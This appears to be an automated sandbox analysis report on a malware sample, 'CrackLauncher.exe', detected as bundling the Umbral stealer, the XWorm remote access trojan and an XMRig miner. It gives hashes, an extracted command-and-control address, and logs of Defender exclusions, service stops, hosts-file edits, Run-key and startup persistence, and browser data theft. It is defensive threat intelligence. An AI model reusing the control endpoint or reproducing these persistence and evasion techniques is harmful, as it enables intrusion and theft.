umbral | 87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95

Analysis

max time kernel
82s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
29-06-2024 20:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CrackLauncher.exe
Size

3.0MB
MD5

6850a8c541b310a2f4a5cd88352856a3
SHA1

372ff19e90cec46e37797b343fe6f537116b4aae
SHA256

87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95
SHA512

924d20cd368e797a771cf8b27b5e8994c62139a85a92ca068b64b0ac65598475b2225a81d08abb2aab9ad87f08d261f950219c16cee1b6d2e21c4b0c95eee4fa
SSDEEP

49152:g97jAtnr1ky+cFvVnJxuw9APD764uBxsPqlRJiM4C/d7Nch8zmOqYmlMH9TLi:g9otJOc/Jxuw9g764ssPqlbiM46ch8z6

Score

10^/10

umbral xmrig xworm evasion execution miner persistence rat spyware stealer trojan upx

Malware Config

Extracted

Family

xworm

Version

5.0

127.0.0.1:28223

unknown-sunglasses.gl.at.ply.gg:28223

Mutex

rVUJpGK3xHCE778M

Attributes

Install_directory
%AppData%
install_file
svchost.exe

aes.plain

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0009000000023311-43.dat	family_umbral
behavioral2/memory/4972-50-0x000001E4CDBB0000-0x000001E4CDBF0000-memory.dmp	family_umbral

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/3628-102-0x0000000000400000-0x0000000000412000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 8 IoCs

miner

resource	yara_rule
behavioral2/memory/1296-627-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/1296-626-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/1296-629-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/1296-630-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/1296-633-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/1296-632-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/1296-631-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/1296-3489-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
656	powershell.exe
3920	powershell.exe
1228	powershell.exe
1984	powershell.exe
4628	powershell.exe
1484	powershell.exe
4276	powershell.exe
2924	powershell.exe
4260	powershell.exe
4372	powershell.exe
2464	powershell.exe
4988	powershell.exe
2788	powershell.exe
1880	powershell.exe
3900	powershell.exe
4604	powershell.exe
4796	powershell.exe
1052	powershell.exe
2144	powershell.exe
932	powershell.exe
1740	powershell.exe
4208	powershell.exe
2056	powershell.exe
3800	powershell.exe
1052	powershell.exe
4936	powershell.exe
3864	powershell.exe
1036	powershell.exe
4988	powershell.exe
4272	powershell.exe
3488	powershell.exe
4536	powershell.exe
3616	powershell.exe
4420	powershell.exe
396	powershell.exe
4704	powershell.exe
216	powershell.exe
4596	powershell.exe
4752	powershell.exe
3968	powershell.exe
3008	powershell.exe
5064	powershell.exe
4220	powershell.exe
2432	powershell.exe
3432	powershell.exe
4772	powershell.exe
4440	powershell.exe
2560	powershell.exe
4372	powershell.exe
4328	powershell.exe
3204	powershell.exe
3400	powershell.exe
5076	powershell.exe
4640	powershell.exe
4852	powershell.exe
4696	powershell.exe
4964	powershell.exe
4216	powershell.exe
1980	powershell.exe
628	powershell.exe
3968	powershell.exe
2172	powershell.exe
872	powershell.exe
5088	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/files/0x0009000000023313-66.dat	net_reactor
behavioral2/memory/4520-76-0x0000000000870000-0x0000000000A58000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 22 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	CrackLauncher.exe

Drops startup file 24 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	MSBuild.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	MSBuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe

Executes dropped EXE 64 IoCs

pid	Process
4700	Nursultan Setup.exe
4972	Запустить Nursultan.exe
4520	Nursultan.exe
1840	Nursultan Setup.exe
1640	Запустить Nursultan.exe
5092	Nursultan.exe
3848	Nursultan Setup.exe
4428	Запустить Nursultan.exe
4276	Nursultan.exe
4328	Nursultan Setup.exe
3132	Запустить Nursultan.exe
4276	Nursultan.exe
3044	Nursultan Setup.exe
1320	jqvljmboayxs.exe
3012	Запустить Nursultan.exe
3832	Nursultan.exe
5092	Nursultan Setup.exe
1840	Запустить Nursultan.exe
4896	Nursultan.exe
1840	Nursultan Setup.exe
4600	Запустить Nursultan.exe
4964	Nursultan.exe
4272	Nursultan Setup.exe
4220	Запустить Nursultan.exe
5076	Nursultan.exe
3340	Nursultan Setup.exe
2388	Nursultan.exe
4372	Nursultan Setup.exe
3020	Запустить Nursultan.exe
3488	Nursultan.exe
3304	jqvljmboayxs.exe
1776	Nursultan Setup.exe
4700	Запустить Nursultan.exe
2136	Nursultan.exe
4808	Nursultan Setup.exe
2872	Nursultan.exe
5104	Nursultan Setup.exe
872	Запустить Nursultan.exe
4272	Nursultan.exe
1880	svchost.exe
4548	Nursultan Setup.exe
4616	Запустить Nursultan.exe
4208	Nursultan.exe
884	Nursultan Setup.exe
4276	jqvljmboayxs.exe
2224	Запустить Nursultan.exe
4224	Nursultan.exe
676	Nursultan Setup.exe
4944	Запустить Nursultan.exe
1320	Nursultan.exe
3256	Nursultan Setup.exe
1268	Запустить Nursultan.exe
804	Nursultan.exe
4784	Nursultan Setup.exe
4480	Запустить Nursultan.exe
3204	Nursultan.exe
4964	Nursultan Setup.exe
2540	Запустить Nursultan.exe
2968	Nursultan.exe
4964	Nursultan Setup.exe
5104	Запустить Nursultan.exe
4556	Nursultan.exe
1288	jqvljmboayxs.exe
5064	Nursultan Setup.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1296-621-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1296-627-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1296-626-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1296-625-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1296-624-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1296-622-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1296-623-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1296-629-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1296-630-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1296-633-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1296-632-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1296-631-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1296-3489-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Adds Run key to start application 2 TTPs 64 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	MSBuild.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
